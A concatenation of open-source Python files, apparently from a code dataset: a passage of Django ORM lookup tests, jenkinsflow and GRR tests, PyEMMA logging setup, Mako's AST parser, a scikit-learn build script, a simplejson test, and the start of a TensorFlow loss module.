# none() returns a QuerySet that behaves like any other QuerySet object
self.assertQuerysetEqual(Article.objects.none(), [])
self.assertQuerysetEqual(Article.objects.none().filter(headline__startswith='Article'), [])
self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article').none(), [])
self.assertEqual(Article.objects.none().count(), 0)
self.assertEqual(Article.objects.none().update(headline="This should not take effect"), 0)
self.assertQuerysetEqual([article for article in Article.objects.none().iterator()], [])
def test_in(self):
# using __in with an empty list should return an empty query set
self.assertQuerysetEqual(Article.objects.filter(id__in=[]), [])
self.assertQuerysetEqual(
Article.objects.exclude(id__in=[]),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
def test_in_different_database(self):
with self.assertRaisesMessage(
ValueError,
"Subqueries aren't allowed across different databases. Force the "
"inner query to be evaluated using `list(inner_query)`."
):
list(Article.objects.filter(id__in=Article.objects.using('other').all()))
def test_error_messages(self):
# Programming errors are pointed out with nice error messages
with self.assertRaisesMessage(
FieldError,
"Cannot resolve keyword 'pub_date_year' into field. Choices are: "
"author, author_id, headline, id, pub_date, tag"
):
Article.objects.filter(pub_date_year='2005').count()
with self.assertRaisesMessage(
FieldError,
"Unsupported lookup 'starts' for CharField or join on the field "
"not permitted."
):
Article.objects.filter(headline__starts='Article')
def test_relation_nested_lookup_error(self):
# An invalid nested lookup on a related field raises a useful error.
msg = 'Related Field got invalid lookup: editor'
with self.assertRaisesMessage(FieldError, msg):
Article.objects.filter(author__editor__name='James')
def test_regex(self):
# Create some articles with a bit more interesting headlines for testing field lookups:
for a in Article.objects.all():
a.delete()
now = datetime.now()
Article.objects.create(pub_date=now, headline='f')
Article.objects.create(pub_date=now, headline='fo')
Article.objects.create(pub_date=now, headline='foo')
Article.objects.create(pub_date=now, headline='fooo')
Article.objects.create(pub_date=now, headline='hey-Foo')
Article.objects.create(pub_date=now, headline='bar')
Article.objects.create(pub_date=now, headline='AbBa')
Article.objects.create(pub_date=now, headline='baz')
Article.objects.create(pub_date=now, headline='baxZ')
# zero-or-more
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fo*'),
['<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>']
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'fo*'),
[
'<Article: f>',
'<Article: fo>',
'<Article: foo>',
'<Article: fooo>',
'<Article: hey-Foo>',
]
)
# one-or-more
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fo+'),
['<Article: fo>', '<Article: foo>', '<Article: fooo>']
)
# wildcard
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fooo?'),
['<Article: foo>', '<Article: fooo>']
)
# leading anchor
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'^b'),
['<Article: bar>', '<Article: baxZ>', '<Article: baz>']
)
self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'^a'), ['<Article: AbBa>'])
# trailing anchor
self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'z$'), ['<Article: baz>'])
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'z$'),
['<Article: baxZ>', '<Article: baz>']
)
# character sets
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'ba[rz]'),
['<Article: bar>', '<Article: baz>']
)
self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba.[RxZ]'), ['<Article: baxZ>'])
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'ba[RxZ]'),
['<Article: bar>', '<Article: baxZ>', '<Article: baz>']
)
# and more articles:
Article.objects.create(pub_date=now, headline='foobar')
Article.objects.create(pub_date=now, headline='foobaz')
Article.objects.create(pub_date=now, headline='ooF')
Article.objects.create(pub_date=now, headline='foobarbaz')
Article.objects.create(pub_date=now, headline='zoocarfaz')
Article.objects.create(pub_date=now, headline='barfoobaz')
Article.objects.create(pub_date=now, headline='bazbaRFOO')
# alternation
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'oo(f|b)'),
[
'<Article: barfoobaz>',
'<Article: foobar>',
'<Article: foobarbaz>',
'<Article: foobaz>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'oo(f|b)'),
[
'<Article: barfoobaz>',
'<Article: foobar>',
'<Article: foobarbaz>',
'<Article: foobaz>',
'<Article: ooF>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'^foo(f|b)'),
['<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>']
)
# greedy matching
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'b.*az'),
[
'<Article: barfoobaz>',
'<Article: baz>',
'<Article: bazbaRFOO>',
'<Article: foobarbaz>',
'<Article: foobaz>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'b.*ar'),
[
'<Article: bar>',
'<Article: barfoobaz>',
'<Article: bazbaRFOO>',
'<Article: foobar>',
'<Article: foobarbaz>',
]
)
@skipUnlessDBFeature('supports_regex_backreferencing')
def test_regex_backreferencing(self):
# grouping and backreferences
now = datetime.now()
Article.objects.create(pub_date=now, headline='foobar')
Article.objects.create(pub_date=now, headline='foobaz')
Article.objects.create(pub_date=now, headline='ooF')
Article.objects.create(pub_date=now, headline='foobarbaz')
Article.objects.create(pub_date=now, headline='zoocarfaz')
Article.objects.create(pub_date=now, headline='barfoobaz')
Article.objects.create(pub_date=now, headline='bazbaRFOO')
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'b(.).*b\1'),
['<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>']
)
def test_regex_null(self):
"""
Ensure that a regex lookup does not fail on null/None values
"""
Season.objects.create(year=2012, gt=None)
self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^$'), [])
def test_regex_non_string(self):
"""
Ensure that a regex lookup does not fail on non-string fields
"""
Season.objects.create(year=2013, gt=444)
self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^444$'), ['<Season: 2013>'])
def test_regex_non_ascii(self):
"""
Ensure that a regex lookup does not trip on non-ASCII characters.
"""
Player.objects.create(name='\u2660')
Player.objects.get(name__regex='\u2660')
def test_nonfield_lookups(self):
"""
Ensure that a lookup query containing non-fields raises the proper
exception.
"""
with self.assertRaises(FieldError):
Article.objects.filter(headline__blahblah=99)
with self.assertRaises(FieldError):
Article.objects.filter(headline__blahblah__exact=99)
with self.assertRaises(FieldError):
Article.objects.filter(blahblah=99)
def test_lookup_collision(self):
"""
Ensure that genuine field names don't collide with built-in lookup
types ('year', 'gt', 'range', 'in' etc.).
Refs #11670.
"""
# Here we're using 'gt' as a code number for the year, e.g. 111=>2009.
season_2009 = Season.objects.create(year=2009, gt=111)
season_2009.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2010 = Season.objects.create(year=2010, gt=222)
season_2010.games.create(home="Houston Astros", away="Chicago Cubs")
season_2010.games.create(home="Houston Astros", away="Milwaukee Brewers")
season_2010.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2011 = Season.objects.create(year=2011, gt=333)
season_2011.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2011.games.create(home="Houston Astros", away="Milwaukee Brewers")
hunter_pence = Player.objects.create(name="Hunter Pence")
hunter_pence.games.set(Game.objects.filter(season__year__in=[2009, 2010]))
pudge = Player.objects.create(name="Ivan Rodriquez")
pudge.games.set(Game.objects.filter(season__year=2009))
pedro_feliz = Player.objects.create(name="Pedro Feliz")
pedro_feliz.games.set(Game.objects.filter(season__year__in=[2011]))
johnson = Player.objects.create(name="Johnson")
johnson.games.set(Game.objects.filter(season__year__in=[2011]))
# Games in 2010
self.assertEqual(Game.objects.filter(season__year=2010).count(), 3)
self.assertEqual(Game.objects.filter(season__year__exact=2010).count(), 3)
self.assertEqual(Game.objects.filter(season__gt=222).count(), 3)
self.assertEqual(Game.objects.filter(season__gt__exact=222).count(), 3)
# Games in 2011
self.assertEqual(Game.objects.filter(season__year=2011).count(), 2)
self.assertEqual(Game.objects.filter(season__year__exact=2011).count(), 2)
self.assertEqual(Game.objects.filter(season__gt=333).count(), 2)
self.assertEqual(Game.objects.filter(season__gt__exact=333).count(), 2)
self.assertEqual(Game.objects.filter(season__year__gt=2010).count(), 2)
self.assertEqual(Game.objects.filter(season__gt__gt=222).count(), 2)
# Games played in 2010 and 2011
self.assertEqual(Game.objects.filter(season__year__in=[2010, 2011]).count(), 5)
self.assertEqual(Game.objects.filter(season__year__gt=2009).count(), 5)
self.assertEqual(Game.objects.filter(season__gt__in=[222, 333]).count(), 5)
self.assertEqual(Game.objects.filter(season__gt__gt=111).count(), 5)
# Players who played in 2009
self.assertEqual(Player.objects.filter(games__season__year=2009).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__exact=2009).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt=111).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt__exact=111).distinct().count(), 2)
# Players who played in 2010
self.assertEqual(Player.objects.filter(games__season__year=2010).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__year__exact=2010).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__gt=222).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__gt__exact=222).distinct().count(), 1)
# Players who played in 2011
self.assertEqual(Player.objects.filter(games__season__year=2011).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__exact=2011).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt=333).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__gt=2010).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt__gt=222).distinct().count(), 2)
def test_chain_date_time_lookups(self):
self.assertQuerysetEqual(
Article.objects.filter(pub_date__month__gt=7),
['<Article: Article 5>', '<Article: Article 6>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__day__gte=27),
['<Article: Article 2>', '<Article: Article 3>',
'<Article: Article 4>', '<Article: Article 7>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__hour__lt=8),
['<Article: Article 1>', '<Article: Article 2>',
'<Article: Article 3>', '<Article: Article 4>',
'<Article: Article 7>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__minute__lte=0),
['<Article: Article 1>', '<Article: Article 2>',
'<Article: Article 3>', '<Article: Article 4>',
'<Article: Article 5>', '<Article: Article 6>',
'<Article: Article 7>'],
ordered=False
)
class LookupTransactionTests(TransactionTestCase):
available_apps = ['lookup']
@ignore_warnings(category=RemovedInDjango20Warning)
@skipUnless(connection.vendor == 'mysql', 'requires MySQL')
def test_mysql_lookup_search(self):
# To use fulltext indexes on MySQL either version 5.6 is needed, or one must use
# MyISAM tables. Neither of these combinations is currently available on CI, so
# lets manually create a MyISAM table for Article model.
with connection.cursor() as cursor:
cursor.execute(
"CREATE TEMPORARY TABLE myisam_article ("
" id INTEGER PRIMARY KEY AUTO_INCREMENT, "
" headline VARCHAR(100) NOT NULL "
") ENGINE MYISAM")
dr = MyISAMArticle.objects.create(headline='Django Reinhardt')
MyISAMArticle.objects.create(headline='Ringo Star')
# NOTE: Needs to be created after the article has been saved.
cursor.execute(
'CREATE FULLTEXT INDEX myisam_article_ft ON myisam_article (headline)')
self.assertQuerysetEqual(
MyISAMArticle.objects.filter(headline__search='Reinhardt'),
[dr], lambda x: x)
|
lechat/jenkinsflow
|
refs/heads/master
|
test/direct_url_test.py
|
1
|
# Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from jenkinsflow.flow import serial
from .framework import api_select
def test_direct_url_is_public_url(api_type, capsys):
with api_select.api(__file__, api_type) as api:
api.job('j1', 0.01, max_fails=0, expect_invocations=1, expect_order=1, params=(('s1', 'Hi', 'desc'), ('c1', ('true', 'maybe', 'false'), 'desc')))
api.job('j2', 0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
with serial(api, timeout=40, job_name_prefix=api.job_name_prefix, report_interval=1, direct_url=api.public_uri) as ctrl:
ctrl.invoke('j1', s1='HELLO', c1=True)
ctrl.invoke('j2')
sout, _ = capsys.readouterr()
assert '//job' not in sout
assert '/job/' in sout
def test_direct_url_trailing_slash(api_type, capsys):
with api_select.api(__file__, api_type) as api:
api.job('j1', 0.01, max_fails=0, expect_invocations=1, expect_order=1, params=(('s1', 'Hi', 'desc'),))
api.job('j2', 0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
with serial(api, timeout=40, job_name_prefix=api.job_name_prefix, report_interval=1, direct_url=api.public_uri + '/') as ctrl:
ctrl.invoke('j1', s1='HELLO')
ctrl.invoke('j2')
sout, _ = capsys.readouterr()
assert '//job' not in sout
assert '/job/' in sout
|
darrenbilby/grr
|
refs/heads/master
|
endtoend_tests/processes.py
|
10
|
#!/usr/bin/env python
"""End to end tests for lib.flows.general.processes."""
from grr.endtoend_tests import base
from grr.lib import aff4
class TestProcessListing(base.AutomatedTest):
"""Test ListProcesses."""
platforms = ["Linux", "Windows", "Darwin"]
flow = "ListProcesses"
output_path = "analysis/ListProcesses/testing"
args = {"output": output_path}
def CheckFlow(self):
procs = aff4.FACTORY.Open(self.client_id.Add(self.output_path), mode="r",
token=self.token)
self.assertIsInstance(procs, aff4.RDFValueCollection)
process_list = list(procs)
# Make sure there are at least some results.
self.assertGreater(len(process_list), 5)
expected_name = self.GetGRRBinaryName()
for p in process_list:
if expected_name in p.exe:
return
self.fail("Process listing does not contain %s." % expected_name)
|
arokem/PyEMMA
|
refs/heads/devel
|
pyemma/util/log.py
|
2
|
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University
# Berlin, 14195 Berlin, Germany.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on 15.10.2013
@author: marscher
'''
__all__ = ['getLogger', 'enabled', 'CRITICAL', 'DEBUG', 'FATAL', 'INFO', 'NOTSET',
'WARN', 'WARNING']
import logging
reload(logging)
from logging import CRITICAL, FATAL, ERROR, WARNING, WARN, INFO, DEBUG, NOTSET
enabled = False
class dummyLogger(object):
""" set up a dummy logger if logging is disabled"""
def dummy(self, kwargs):
pass
def __getattr__(self, name):
return self.dummy
dummyInstance = None
def setupLogging():
"""
parses pyemma configuration file and creates a logger conf_values from that
"""
global enabled, dummyInstance
from pyemma.util.config import conf_values
args = conf_values['Logging']
enabled = args.enabled == 'True'
toconsole = args.toconsole == 'True'
tofile = args.tofile == 'True'
if enabled:
try:
logging.basicConfig(level=args.level,
format=args.format,
datefmt='%d-%m-%y %H:%M:%S')
except IOError as ie:
import warnings
warnings.warn(
'logging could not be initialized, because of %s' % ie)
return
# in case we want to log to both file and stream, add a separate handler
formatter = logging.Formatter(args.format)
root_logger = logging.getLogger('')
root_handlers = root_logger.handlers
if toconsole:
ch = root_handlers[0]
ch.setLevel(args.level)
ch.setFormatter(formatter)
else: # remove first handler (which should be streamhandler)
assert len(root_handlers) == 1
streamhandler = root_handlers.pop()
assert isinstance(streamhandler, logging.StreamHandler)
if tofile:
# set delay to True, to prevent creation of empty log files
fh = logging.FileHandler(args.file, mode='a', delay=True)
fh.setFormatter(formatter)
fh.setLevel(args.level)
root_logger.addHandler(fh)
# if user enabled logging, but disallowed file and console logging, disable
# logging completely.
if not tofile and not toconsole:
enabled = False
dummyInstance = dummyLogger()
else:
dummyInstance = dummyLogger()
def getLogger(name=None):
if not enabled:
return dummyInstance
# if name is not given, return a logger with name of the calling module.
if not name:
import traceback
t = traceback.extract_stack(limit=2)
path = t[0][0]
pos = path.rfind('pyemma')
if pos == -1:
pos = path.rfind('scripts/')
name = path[pos:]
return logging.getLogger(name)
# init logging
setupLogging()
|
artdent/jgments
|
refs/heads/master
|
lib/Mako-0.3.4/mako/pyparser.py
|
21
|
# ast.py
# Copyright (C) Mako developers
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Handles parsing of Python code.
Parsing to AST is done via _ast on Python > 2.5, otherwise the compiler
module is used.
"""
from StringIO import StringIO
from mako import exceptions, util
import operator
if util.py3k:
# words that cannot be assigned to (notably
# smaller than the total keys in __builtins__)
reserved = set(['True', 'False', 'None', 'print'])
# the "id" attribute on a function node
arg_id = operator.attrgetter('arg')
else:
# words that cannot be assigned to (notably
# smaller than the total keys in __builtins__)
reserved = set(['True', 'False', 'None'])
# the "id" attribute on a function node
arg_id = operator.attrgetter('id')
try:
import _ast
util.restore__ast(_ast)
import _ast_util
except ImportError:
_ast = None
from compiler import parse as compiler_parse
from compiler import visitor
def parse(code, mode='exec', **exception_kwargs):
"""Parse an expression into AST"""
try:
if _ast:
return _ast_util.parse(code, '<unknown>', mode)
else:
if isinstance(code, unicode):
code = code.encode('ascii', 'backslashreplace')
return compiler_parse(code, mode)
except Exception, e:
raise exceptions.SyntaxException("(%s) %s (%s)" % (e.__class__.__name__, str(e), repr(code[0:50])), **exception_kwargs)
if _ast:
class FindIdentifiers(_ast_util.NodeVisitor):
def __init__(self, listener, **exception_kwargs):
self.in_function = False
self.in_assign_targets = False
self.local_ident_stack = {}
self.listener = listener
self.exception_kwargs = exception_kwargs
def _add_declared(self, name):
if not self.in_function:
self.listener.declared_identifiers.add(name)
def visit_ClassDef(self, node):
self._add_declared(node.name)
def visit_Assign(self, node):
# flip around the visiting of Assign so the expression gets evaluated first,
# in the case of a clause like "x=x+5" (x is undeclared)
self.visit(node.value)
in_a = self.in_assign_targets
self.in_assign_targets = True
for n in node.targets:
self.visit(n)
self.in_assign_targets = in_a
if util.py3k:
# ExceptHandler is in Python 2, but this
# block only works in Python 3 (and is required there)
def visit_ExceptHandler(self, node):
if node.name is not None:
self._add_declared(node.name)
if node.type is not None:
self.listener.undeclared_identifiers.add(node.type.id)
for statement in node.body:
self.visit(statement)
def visit_FunctionDef(self, node):
self._add_declared(node.name)
# push function state onto stack. dont log any
# more identifiers as "declared" until outside of the function,
# but keep logging identifiers as "undeclared".
# track argument names in each function header so they arent counted as "undeclared"
saved = {}
inf = self.in_function
self.in_function = True
for arg in node.args.args:
if arg_id(arg) in self.local_ident_stack:
saved[arg_id(arg)] = True
else:
self.local_ident_stack[arg_id(arg)] = True
for n in node.body:
self.visit(n)
self.in_function = inf
for arg in node.args.args:
if arg_id(arg) not in saved:
del self.local_ident_stack[arg_id(arg)]
def visit_For(self, node):
# flip around visit
self.visit(node.iter)
self.visit(node.target)
for statement in node.body:
self.visit(statement)
for statement in node.orelse:
self.visit(statement)
def visit_Name(self, node):
if isinstance(node.ctx, _ast.Store):
self._add_declared(node.id)
if node.id not in reserved and \
node.id not in self.listener.declared_identifiers and \
node.id not in self.local_ident_stack:
self.listener.undeclared_identifiers.add(node.id)
def visit_Import(self, node):
for name in node.names:
if name.asname is not None:
self._add_declared(name.asname)
else:
self._add_declared(name.name.split('.')[0])
def visit_ImportFrom(self, node):
for name in node.names:
if name.asname is not None:
self._add_declared(name.asname)
else:
if name.name == '*':
raise exceptions.CompileException("'import *' is not supported, since all identifier names must be explicitly declared. Please use the form 'from <modulename> import <name1>, <name2>, ...' instead.", **self.exception_kwargs)
self._add_declared(name.name)
class FindTuple(_ast_util.NodeVisitor):
def __init__(self, listener, code_factory, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
self.code_factory = code_factory
def visit_Tuple(self, node):
for n in node.elts:
p = self.code_factory(n, **self.exception_kwargs)
self.listener.codeargs.append(p)
self.listener.args.append(ExpressionGenerator(n).value())
self.listener.declared_identifiers = self.listener.declared_identifiers.union(p.declared_identifiers)
self.listener.undeclared_identifiers = self.listener.undeclared_identifiers.union(p.undeclared_identifiers)
class ParseFunc(_ast_util.NodeVisitor):
def __init__(self, listener, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
def visit_FunctionDef(self, node):
self.listener.funcname = node.name
argnames = [arg_id(arg) for arg in node.args.args]
if node.args.vararg:
argnames.append(node.args.vararg)
if node.args.kwarg:
argnames.append(node.args.kwarg)
self.listener.argnames = argnames
self.listener.defaults = node.args.defaults # ast
self.listener.varargs = node.args.vararg
self.listener.kwargs = node.args.kwarg
class ExpressionGenerator(object):
def __init__(self, astnode):
self.generator = _ast_util.SourceGenerator(' ' * 4)
self.generator.visit(astnode)
def value(self):
return ''.join(self.generator.result)
else:
class FindIdentifiers(object):
def __init__(self, listener, **exception_kwargs):
self.in_function = False
self.local_ident_stack = {}
self.listener = listener
self.exception_kwargs = exception_kwargs
def _add_declared(self, name):
if not self.in_function:
self.listener.declared_identifiers.add(name)
def visitClass(self, node, *args):
self._add_declared(node.name)
def visitAssName(self, node, *args):
self._add_declared(node.name)
def visitAssign(self, node, *args):
# flip around the visiting of Assign so the expression gets evaluated first,
# in the case of a clause like "x=x+5" (x is undeclared)
self.visit(node.expr, *args)
for n in node.nodes:
self.visit(n, *args)
def visitFunction(self,node, *args):
self._add_declared(node.name)
# push function state onto stack. dont log any
# more identifiers as "declared" until outside of the function,
# but keep logging identifiers as "undeclared".
# track argument names in each function header so they arent counted as "undeclared"
saved = {}
inf = self.in_function
self.in_function = True
for arg in node.argnames:
if arg in self.local_ident_stack:
saved[arg] = True
else:
self.local_ident_stack[arg] = True
for n in node.getChildNodes():
self.visit(n, *args)
self.in_function = inf
for arg in node.argnames:
if arg not in saved:
del self.local_ident_stack[arg]
def visitFor(self, node, *args):
# flip around visit
self.visit(node.list, *args)
self.visit(node.assign, *args)
self.visit(node.body, *args)
def visitName(self, node, *args):
if node.name not in reserved and node.name not in self.listener.declared_identifiers and node.name not in self.local_ident_stack:
self.listener.undeclared_identifiers.add(node.name)
def visitImport(self, node, *args):
for (mod, alias) in node.names:
if alias is not None:
self._add_declared(alias)
else:
self._add_declared(mod.split('.')[0])
def visitFrom(self, node, *args):
for (mod, alias) in node.names:
if alias is not None:
self._add_declared(alias)
else:
if mod == '*':
raise exceptions.CompileException("'import *' is not supported, since all identifier names must be explicitly declared. Please use the form 'from <modulename> import <name1>, <name2>, ...' instead.", **self.exception_kwargs)
self._add_declared(mod)
def visit(self, expr):
visitor.walk(expr, self) #, walker=walker())
class FindTuple(object):
def __init__(self, listener, code_factory, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
self.code_factory = code_factory
def visitTuple(self, node, *args):
for n in node.nodes:
p = self.code_factory(n, **self.exception_kwargs)
self.listener.codeargs.append(p)
self.listener.args.append(ExpressionGenerator(n).value())
self.listener.declared_identifiers = self.listener.declared_identifiers.union(p.declared_identifiers)
self.listener.undeclared_identifiers = self.listener.undeclared_identifiers.union(p.undeclared_identifiers)
def visit(self, expr):
visitor.walk(expr, self) #, walker=walker())
class ParseFunc(object):
def __init__(self, listener, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
def visitFunction(self, node, *args):
self.listener.funcname = node.name
self.listener.argnames = node.argnames
self.listener.defaults = node.defaults
self.listener.varargs = node.varargs
self.listener.kwargs = node.kwargs
def visit(self, expr):
visitor.walk(expr, self)
class ExpressionGenerator(object):
"""given an AST node, generates an equivalent literal Python expression."""
def __init__(self, astnode):
self.buf = StringIO()
visitor.walk(astnode, self) #, walker=walker())
def value(self):
return self.buf.getvalue()
def operator(self, op, node, *args):
self.buf.write("(")
self.visit(node.left, *args)
self.buf.write(" %s " % op)
self.visit(node.right, *args)
self.buf.write(")")
def booleanop(self, op, node, *args):
self.visit(node.nodes[0])
for n in node.nodes[1:]:
self.buf.write(" " + op + " ")
self.visit(n, *args)
def visitConst(self, node, *args):
self.buf.write(repr(node.value))
def visitAssName(self, node, *args):
# TODO: figure out OP_ASSIGN, other OP_s
self.buf.write(node.name)
def visitName(self, node, *args):
self.buf.write(node.name)
def visitMul(self, node, *args):
self.operator("*", node, *args)
def visitAnd(self, node, *args):
self.booleanop("and", node, *args)
def visitOr(self, node, *args):
self.booleanop("or", node, *args)
def visitBitand(self, node, *args):
self.booleanop("&", node, *args)
def visitBitor(self, node, *args):
self.booleanop("|", node, *args)
def visitBitxor(self, node, *args):
self.booleanop("^", node, *args)
def visitAdd(self, node, *args):
self.operator("+", node, *args)
def visitGetattr(self, node, *args):
self.visit(node.expr, *args)
self.buf.write(".%s" % node.attrname)
def visitSub(self, node, *args):
self.operator("-", node, *args)
def visitNot(self, node, *args):
self.buf.write("not ")
self.visit(node.expr)
def visitDiv(self, node, *args):
self.operator("/", node, *args)
def visitFloorDiv(self, node, *args):
self.operator("//", node, *args)
def visitSubscript(self, node, *args):
self.visit(node.expr)
self.buf.write("[")
[self.visit(x) for x in node.subs]
self.buf.write("]")
def visitUnarySub(self, node, *args):
self.buf.write("-")
self.visit(node.expr)
def visitUnaryAdd(self, node, *args):
self.buf.write("-")
self.visit(node.expr)
def visitSlice(self, node, *args):
self.visit(node.expr)
self.buf.write("[")
if node.lower is not None:
self.visit(node.lower)
self.buf.write(":")
if node.upper is not None:
self.visit(node.upper)
self.buf.write("]")
def visitDict(self, node):
self.buf.write("{")
c = node.getChildren()
for i in range(0, len(c), 2):
self.visit(c[i])
self.buf.write(": ")
self.visit(c[i+1])
if i<len(c) -2:
self.buf.write(", ")
self.buf.write("}")
def visitTuple(self, node):
self.buf.write("(")
c = node.getChildren()
for i in range(0, len(c)):
self.visit(c[i])
if i<len(c) - 1:
self.buf.write(", ")
self.buf.write(")")
def visitList(self, node):
self.buf.write("[")
c = node.getChildren()
for i in range(0, len(c)):
self.visit(c[i])
if i<len(c) - 1:
self.buf.write(", ")
self.buf.write("]")
def visitListComp(self, node):
self.buf.write("[")
self.visit(node.expr)
self.buf.write(" ")
for n in node.quals:
self.visit(n)
self.buf.write("]")
def visitListCompFor(self, node):
self.buf.write(" for ")
self.visit(node.assign)
self.buf.write(" in ")
self.visit(node.list)
for n in node.ifs:
self.visit(n)
def visitListCompIf(self, node):
self.buf.write(" if ")
self.visit(node.test)
def visitCompare(self, node):
self.visit(node.expr)
for tup in node.ops:
self.buf.write(tup[0])
self.visit(tup[1])
def visitCallFunc(self, node, *args):
self.visit(node.node)
self.buf.write("(")
if len(node.args):
self.visit(node.args[0])
for a in node.args[1:]:
self.buf.write(", ")
self.visit(a)
self.buf.write(")")
class walker(visitor.ASTVisitor):
def dispatch(self, node, *args):
print "Node:", str(node)
#print "dir:", dir(node)
return visitor.ASTVisitor.dispatch(self, node, *args)
|
zuku1985/scikit-learn
|
refs/heads/master
|
sklearn/__check_build/setup.py
|
113
|
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
# License: BSD 3 clause
import numpy
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('__check_build', parent_package, top_path)
config.add_extension('_check_build',
sources=['_check_build.pyx'],
include_dirs=[numpy.get_include()])
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
samisalkosuo/pureapp
|
refs/heads/master
|
developerworks/simplejson/tests/test_default.py
|
149
|
from unittest import TestCase
import simplejson as json
class TestDefault(TestCase):
def test_default(self):
self.assertEqual(
json.dumps(type, default=repr),
json.dumps(repr(type)))
|
ishay2b/tensorflow
|
refs/heads/segnet
|
tensorflow/contrib/kernel_methods/python/losses.py
|
31
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of kernel-methods-related loss operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.losses import losses
def sparse_multiclass_hinge_loss(
labels,
logits,
weights=1.0,
scope=None,
loss_collection=ops.GraphKeys.LOSSES,
reduction=losses.Reduction.SUM_BY_NONZERO_WEIGHTS):
"""Adds Ops for computing the multiclass hinge loss.
The implementation is based on the following paper:
On the Algorithmic Implementation of Multiclass Kernel-based Vector Machines
